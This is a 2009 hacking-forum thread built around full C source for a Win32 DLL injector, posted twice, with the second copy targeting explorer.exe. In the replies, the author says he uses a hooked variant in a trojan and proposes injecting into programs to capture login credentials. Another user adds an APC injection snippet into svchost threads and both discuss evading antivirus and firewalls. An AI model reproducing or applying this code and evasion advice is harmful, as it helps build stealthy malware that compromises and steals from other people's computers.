[Win32] Injector v0.1

**zorgion** · 11-05-2009

My way of dll-injection.

Code:

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

#define MUTEX_NAME		"MyInjector"
#define PROCESS_NAME	"someprocess.exe"
#define TITLE_NAME		"MyInjector"

struct TARGET_PROCESS_INFO {
	char cGetLastError[MAX_PATH];
	char cProcessName[MAX_PATH];
	char cDLLName[MAX_PATH];
	char cLoaderName[MAX_PATH];
	// HWND hTargetWnd; // Comes in version 2
};
TARGET_PROCESS_INFO TPI;

BOOL fExists(const char* cFile) {
	GetFileAttributes(cFile);
	switch(GetLastError()) {
		case ERROR_FILE_NOT_FOUND: {
			strcpy(TPI.cGetLastError,"GetFileAttributes");
			return FALSE;
		}
		case ERROR_PATH_NOT_FOUND: {
			strcpy(TPI.cGetLastError,"GetFileAttributes");
			return FALSE;
		}
		default: break;
	}
	return TRUE;
}

BOOL GetDLLName(char *cFile) {
	if(GetModuleFileName(NULL,cFile,MAX_PATH) == NULL) {
		strcpy(TPI.cGetLastError,"GetModuleFileName");
		return FALSE;
	}
	else if(GetModuleFileName(NULL,cFile,MAX_PATH) == ERROR_INSUFFICIENT_BUFFER) {
		strcpy(TPI.cGetLastError,"GetModuleFileName");
		return FALSE;
	}
	else if(GetModuleFileName(NULL,cFile,MAX_PATH)) {
		strcpy(TPI.cLoaderName,TPI.cDLLName);
		strcpy(&TPI.cDLLName[strlen(TPI.cDLLName)-3],"dll");
		return TRUE;
	}
	return FALSE;
}

DWORD GetProcessID(char cProcessName[MAX_PATH]) {
	PROCESSENTRY32 ProcessEntry32 = { 0 };
	HANDLE hSnapshot 	= NULL;
	if((hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == NULL) {
		strcpy(TPI.cGetLastError,"CreateToolhelp32Snapshot");
		return NULL;
	}
	if(Process32First(hSnapshot,&ProcessEntry32) == FALSE) {
		strcpy(TPI.cGetLastError,"Process32First");
		if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return NULL;
	}
	while(Process32Next(hSnapshot,&ProcessEntry32) != FALSE) {
		if(strcmp(cProcessName,ProcessEntry32.szExeFile) == 0) {
			if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
			return ProcessEntry32.th32ProcessID;
		}
	}
	strcpy(TPI.cGetLastError,"Process32Next");
	if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
	return NULL;;
}

BOOL InjectDLL(char cProcessName[MAX_PATH],char cDllName[MAX_PATH]) {
	FARPROC LoadLibAddress 	= NULL;
	LPVOID lpAddress 		= NULL;
	DWORD PID				= NULL;
	HMODULE hModKernel32 	= NULL;
	HANDLE hProcess 		= NULL;
	if((PID = GetProcessID(cProcessName)) == NULL) return FALSE;
	if((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID)) == NULL) {
		strcpy(TPI.cGetLastError,"OpenProcess");
		return FALSE;
	}
	if((hModKernel32 = GetModuleHandle("kernel32.dll")) == NULL) {
		strcpy(TPI.cGetLastError,"GetModuleHandle");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}	
	if((LoadLibAddress = GetProcAddress(hModKernel32,"LoadLibraryA")) == NULL) {
		strcpy(TPI.cGetLastError,"GetProcAddress");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if((lpAddress = VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE)) == NULL) {
		strcpy(TPI.cGetLastError,"VirtualAllocEx");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if(WriteProcessMemory(hProcess,lpAddress,cDllName,MAX_PATH,NULL) == NULL) {
		strcpy(TPI.cGetLastError,"WriteProcessMemory");
		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if(CreateRemoteThread(hProcess,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibAddress,lpAddress,NULL,NULL) == NULL) {
		strcpy(TPI.cGetLastError,"CreateRemoteThread");
		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
	if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
	return TRUE;
}

int main( ) {
	BOOL bPrinted = FALSE;
	ZeroMemory(TPI.cDLLName,MAX_PATH);
	ZeroMemory(TPI.cLoaderName,MAX_PATH);
	HANDLE hMutex = NULL;
	if((hMutex = CreateMutex(NULL,FALSE,MUTEX_NAME)) == NULL) {
		ExitProcess(0); // We don't want multiple windows of our application.
	}
	if(SetConsoleTitle(TITLE_NAME) == NULL) {
		printf(	"Error: 'SetConsoleTitle' failed. Looking up error message with GetLastError():\n %d \n",GetLastError());
		getchar();
		CloseHandle(hMutex);
		return 0;
	}
	if(GetDLLName(TPI.cDLLName) == FALSE) {
		if(strcmp(TPI.cGetLastError,"") != 0) {
			printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
		}
		else {
			printf("Error: DLL-file not found !\n");
		}
		getchar();
		CloseHandle(hMutex);
		return 0;
	}
	if(fExists(TPI.cDLLName) == FALSE) {
		printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
		getchar();
		CloseHandle(hMutex);
		return 0;
	}
	while(GetProcessID(PROCESS_NAME) == NULL) {
		if(bPrinted == FALSE) {
			printf("Waiting for '%s' to start...\n",PROCESS_NAME);
			bPrinted = TRUE;
		}
		Sleep(10);
	}
	if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == FALSE) {
		printf("Error: '%s' failed.\nLooking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
		getchar();
	}
	else if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == TRUE) {
		if(strcmp(TPI.cGetLastError,"") != 0) {
			printf("Error: Injection complete, but failed to close process handle because 'CloseHandle' failed.\nLooking up error message with GetLastError():\n %s \n",TPI.cGetLastError);
		}
		else {
			printf("Success: Injection complete, 0 errors");
		}
		getchar();
	}
	CloseHandle(hMutex);
	return 1;
}

Please report bugs or anything else.

In the next version:
- other methods of injection
- GUI
- make it possible to store a dll-file as shellcode into the loader (while running the program) and inject it. (if my my plan works as it's should)

**frmn** · 11-05-2009

what do u wanna use this injector for?
and what advantages does it have?

**zorgion** · 11-05-2009

I did not plan to use it in close future, but could be a nice future too add to any remote tools. (An example would be if a program on the remote computer has a program that required login info and you could not get the password by sending WM_GETTEXT to the window handler. Then you could inject your own dll-file into the program and hook the functions for the window handling (or something like that))

And the program is only designed to be used before startup of the target, then you could do whatever you like in your dll-file. (I'l first test hooking getprocaddress)

There are other methods allowing you to inject code in a running process, but then again you would have to freeze the process and set debug privs. and that could be detected by the remote process. (They can also detected this easy if they want, but I'm going to add some more stuff in the next version that makes it a bit more harder to detected.)

**silk** · 11-05-2009

Nice code, very clear (except for the tab inconsistencies, which I assume happened when you posted)

**coder_gate** · 11-05-2009

i dont known use your source,can you repair my source ???

Code:

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

#define MUTEX_NAME		"MyInjector"
#define PROCESS_NAME	"explorer.exe"
#define TITLE_NAME		"MyInjector"

struct TARGET_PROCESS_INFO {
	char cGetLastError[MAX_PATH];
	char cProcessName[MAX_PATH];
	char cDLLName[MAX_PATH];
	char cLoaderName[MAX_PATH];
	// HWND hTargetWnd; // Comes in version 2
};
TARGET_PROCESS_INFO TPI;

BOOL fExists(const char* cFile) {
	GetFileAttributes(cFile);
	switch(GetLastError()) {
		case ERROR_FILE_NOT_FOUND: {
			strcpy(TPI.cGetLastError,"GetFileAttributes");
			return FALSE;
		}
		case ERROR_PATH_NOT_FOUND: {
			strcpy(TPI.cGetLastError,"GetFileAttributes");
			return FALSE;
		}
		default: break;
	}
	return TRUE;
}

BOOL GetDLLName(char *cFile) {
	if(GetModuleFileName(NULL,cFile,MAX_PATH) == NULL) {
		strcpy(TPI.cGetLastError,"GetModuleFileName");
		return FALSE;
	}
	else if(GetModuleFileName(NULL,cFile,MAX_PATH) == ERROR_INSUFFICIENT_BUFFER) {
		strcpy(TPI.cGetLastError,"GetModuleFileName");
		return FALSE;
	}
	else if(GetModuleFileName(NULL,cFile,MAX_PATH)) {
		strcpy(TPI.cLoaderName,TPI.cDLLName);
		strcpy(&TPI.cDLLName[strlen(TPI.cDLLName)-3],"dll");
		return TRUE;
	}
	return FALSE;
}

DWORD GetProcessID(char cProcessName[MAX_PATH]) {
	PROCESSENTRY32 ProcessEntry32 = { 0 };
	HANDLE hSnapshot 	= NULL;
	if((hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == NULL) {
		strcpy(TPI.cGetLastError,"CreateToolhelp32Snapshot");
		return NULL;
	}
	if(Process32First(hSnapshot,&ProcessEntry32) == FALSE) {
		strcpy(TPI.cGetLastError,"Process32First");
		if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return NULL;
	}
	while(Process32Next(hSnapshot,&ProcessEntry32) != FALSE) {
		if(strcmp(cProcessName,ProcessEntry32.szExeFile) == 0) {
			if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
			return ProcessEntry32.th32ProcessID;
		}
	}
	strcpy(TPI.cGetLastError,"Process32Next");
	if(CloseHandle(hSnapshot) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
	return NULL;;
}

BOOL InjectDLL(char cProcessName[MAX_PATH],char cDllName[MAX_PATH]) {
	FARPROC LoadLibAddress 	= NULL;
	LPVOID lpAddress 		= NULL;
	DWORD PID				= NULL;
	HMODULE hModKernel32 	= NULL;
	HANDLE hProcess 		= NULL;
	if((PID = GetProcessID(cProcessName)) == NULL) return FALSE;
	if((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID)) == NULL) {
		strcpy(TPI.cGetLastError,"OpenProcess");
		return FALSE;
	}
	if((hModKernel32 = GetModuleHandle("kernel32.dll")) == NULL) {
		strcpy(TPI.cGetLastError,"GetModuleHandle");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}	
	if((LoadLibAddress = GetProcAddress(hModKernel32,"LoadLibraryA")) == NULL) {
		strcpy(TPI.cGetLastError,"GetProcAddress");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if((lpAddress = VirtualAllocEx(hProcess,NULL,MAX_PATH,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE)) == NULL) {
		strcpy(TPI.cGetLastError,"VirtualAllocEx");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if(WriteProcessMemory(hProcess,lpAddress,cDllName,MAX_PATH,NULL) == NULL) {
		strcpy(TPI.cGetLastError,"WriteProcessMemory");
		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if(CreateRemoteThread(hProcess,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibAddress,lpAddress,NULL,NULL) == NULL) {
		strcpy(TPI.cGetLastError,"CreateRemoteThread");
		if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
		if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
		return FALSE;
	}
	if(VirtualFreeEx(hProcess,lpAddress,0,MEM_RELEASE) == NULL) strcpy(TPI.cGetLastError,"VirtualFreeEx");
	if(CloseHandle(hProcess) == NULL) strcpy(TPI.cGetLastError,"CloseHandle");
	return TRUE;
}

int main( ) {
	BOOL bPrinted = FALSE;
	ZeroMemory(TPI.cDLLName,MAX_PATH);
	ZeroMemory(TPI.cLoaderName,MAX_PATH);
	HANDLE hMutex = NULL;
	if((hMutex = CreateMutex(NULL,FALSE,MUTEX_NAME)) == NULL) {
		ExitProcess(0); // We don't want multiple windows of our application.
	}
	if(SetConsoleTitle(TITLE_NAME) == NULL) {
		printf(	"Error: 'SetConsoleTitle' failed. Looking up error message with GetLastError():\n %d \n",GetLastError());
		getchar();
		CloseHandle(hMutex);
		return 0;
	}
	if(GetDLLName(TPI.cDLLName) == FALSE) {
		if(strcmp(TPI.cGetLastError,"") != 0) {
			printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
		}
		else {
			printf("Error: DLL-file not found !\n");
		}
		getchar();
		CloseHandle(hMutex);
		return 0;
	}
	if(fExists(TPI.cDLLName) == FALSE) {
		printf(	"Error: '%s' failed. Looking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
		getchar();
		CloseHandle(hMutex);
		return 0;
	}
	while(GetProcessID(PROCESS_NAME) == NULL) {
		if(bPrinted == FALSE) {
			printf("Waiting for '%s' to start...\n",PROCESS_NAME);
			bPrinted = TRUE;
		}
		Sleep(10);
	}
	if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == FALSE) {
		printf("Error: '%s' failed.\nLooking up error message with GetLastError():\n %d \n",TPI.cGetLastError,GetLastError());
		getchar();
	}
	else if(InjectDLL(PROCESS_NAME,TPI.cDLLName) == TRUE) {
		if(strcmp(TPI.cGetLastError,"") != 0) {
			printf("Error: Injection complete, but failed to close process handle because 'CloseHandle' failed.\nLooking up error message with GetLastError():\n %s \n",TPI.cGetLastError);
		}
		else {
			printf("Success: Injection complete, 0 errors");
		}
		getchar();
	}
	CloseHandle(hMutex);
	return 1;
}

**frmn** · 12-05-2009

any injection method (at runtime) is easy detectable. one reason is that any new thread begins it's execution from KiUserApcDispatcher that can be easy hooked by remote process

and this is hard to fuckup in usermode
another disadvantage of ur method - u have to store dll on disk.

**zorgion** · 12-05-2009

Almost correct! The code can easy be modified to accept shellcode! And I said it was easy to detect ( I did not include the part where I hook some API's I know beeing used to check for calls and stuff because I use my code in a trojan. But then again all of this could also easy be detected, but not by a 'normal' computer user ).

As I said, the modified part of the code (with API hooking) I use for my trojan. I did not say this method I posted was undetectable, did I?

There are many more alternative methods. You got one example (not so mutch used) RhCreateStealthRemoteThread.

The best method I think would be manual-map.
http://www.edgeofnowhere.cc/viewtopic.php?t=305739

**frmn** · 13-05-2009

its not the code u have to use in trojan. any firewall or antivirus with proactive defend will alert ur injection in like 2 points: OpenProcess, CreateRemoteThread.
the easiest way of injecting dll for trojan is adding APC to alertable svchost's thread. and as far as i know it is still undetectable by some firewalls

Code:

PVOID pMZ=GetModuleHandle(TEXT("ntdll.dll"));	
szName =(LPSTR)((IMAGE_FIRST_EXPORT_DIRECTORY(pMZ))->Name+(DWORD)pMZ+2);
NtQueueApcThread(OpenThread(THREAD_SET_CONTEXT,FALSE,(DWORD)(DWORD_PTR)GetTIDbyName("svchost.exe")),(PKNORMAL_ROUTINE)LoadLibraryA,szName,0,0);

Detours is stable, but shitty injection lib. manual-map is also easy detectable and not original method. search for more interesting ones.

btw, i didnt say anything about hooks in ur process. i said about hooks been made by remote process in it's address space.

**zorgion** · 13-05-2009

You could always use the API's dynamically

Or RtlCreateUserThread :p

Anyway, not to many AV detect the old method soo, I guess I ain't gonna wry about it ( I dear you to find a AV, today that does. I know at least NOD, BitDefender, Avast & AVG does not. Gonna test with Norman, Norton AV, F-Secure, Comodo AntiVirus, McAfee & Kaspersky)

**frmn** · 13-05-2009

Or RtlCreateUserThread

u still need open process for it, but nice try.. if u find method of how to avoid writeprocmem api call (not by use NtWriteVirtualMemory, look on sections) it will be pretty nice code

dont forget about CsrClientCallServer in this case

Anyway, not to many AV detect the old method soo

its mostly detected by firewalls (btw try to bypass ZoneAlarm

) ). and antiviruses like Kaspersky...

Thread: [Win32] Injector v0.1

LinkBack

Thread Tools

Display

[Win32] Injector v0.1

Thread Information

Users Browsing this Thread

Similar Threads

Learn Win32 Assembly (ASM)

dll injector

Another Dll injector

c++ injector to inject a vb file

Converting Win32 to DLL

Posting Permissions